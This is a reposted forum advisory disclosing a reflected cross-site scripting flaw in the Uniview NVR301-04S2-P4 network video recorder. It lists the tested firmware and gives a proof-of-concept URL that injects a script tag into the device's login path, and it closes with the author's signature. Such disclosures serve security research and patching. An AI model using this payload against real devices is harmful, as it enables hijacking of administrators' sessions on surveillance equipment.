发布于3月5日3月5日 Members # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) # Author: Bleron Rrustemi # Discovery Date: 2022-11-15 # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ # Datasheet:: https://www.uniview.com/download.do?id=1761643 # Device Firmware: NVR-B3801.20.15.200829 # Tested Version: NVR301-04S2-P4 # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit) # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: IP=IP of the device http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script> Best regards, Bleron Rrustemi Chief Technology Officer Direct: +383 (0) 49 955 503 E-mail: <mailto:[email protected]> [email protected] <http://> Drugëza SHPK Rr. Lekë Dukagjini p.n Prishtinë, 10000 • Kosovo Tel.: +383 49 955 503 www.drugeza.com ü Be GREEN, keep it on the SCREEN
参与讨论
你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。